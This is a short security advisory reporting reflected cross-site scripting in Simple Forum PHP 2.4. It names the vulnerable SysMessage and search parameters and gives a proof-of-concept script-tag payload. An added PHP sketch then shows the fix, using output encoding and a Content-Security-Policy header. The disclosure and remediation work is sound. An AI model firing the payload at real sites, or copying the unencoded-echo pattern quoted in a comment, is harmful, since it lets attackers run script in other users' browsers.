Simple Forum PHP 2.4 Cross Site Scripting

2016.10.18
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

=====================================================
# Simple Forum PHP 2.4 - Reflected XSS
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable parameter : SysMessage
Method : GET
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url:
http://localhost/forum/preview.php?SysMessage=[payload]

Vulnerable parameter : search
Method : POST
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url:
http://simpleforumphp.com/forum/admin.php
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
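
An added example, not code from the advisory or from Simple Forum PHP: a PHP sketch of output encoding for the two reflected parameters named above (SysMessage via GET, search via POST). The function names, the HTML markup and the raw-echo pattern shown in the comment are assumptions, since the application's source is not shown on this page.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; none of these names come from Simple Forum PHP.

/** Return a request value as a bounded string; array input (?SysMessage[]=x) becomes ''. */
function request_string(array $source, string $key, int $maxLen = 500): string
{
    $value = $source[$key] ?? '';
    if (!is_string($value)) {
        return '';
    }
    // substr may cut a multibyte character; ENT_SUBSTITUTE below replaces the broken tail.
    return substr($value, 0, $maxLen);
}

/** Encode for HTML element content and for quoted attribute values. */
function h(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Assumed vulnerable pattern: the parameter is echoed into the page unencoded.
//   echo '<div class="msg">' . $_GET['SysMessage'] . '</div>';

/** Element-content context: the reflected system message. */
function render_message(array $get): string
{
    return '<div class="msg">' . h(request_string($get, 'SysMessage')) . '</div>';
}

/** Attribute context: the value must stay inside quotes for the encoding to hold. */
function render_search_box(array $post): string
{
    return '<input type="text" name="search" value="'
        . h(request_string($post, 'search')) . '">';
}

// Constructed sample input: the payload string quoted in the advisory.
$payload = "<script>alert('Reflected XSS')</script>";

if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/html; charset=UTF-8');
    // Defence in depth: inline scripts are refused even if an encoding call is missed.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}
echo render_message(['SysMessage' => $payload]), "\n";
echo render_search_box(['search' => $payload]), "\n";
```

Run with the PHP CLI, the output shows the payload's angle brackets and quotes emitted as character references, so the browser renders it as text instead of executing it.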

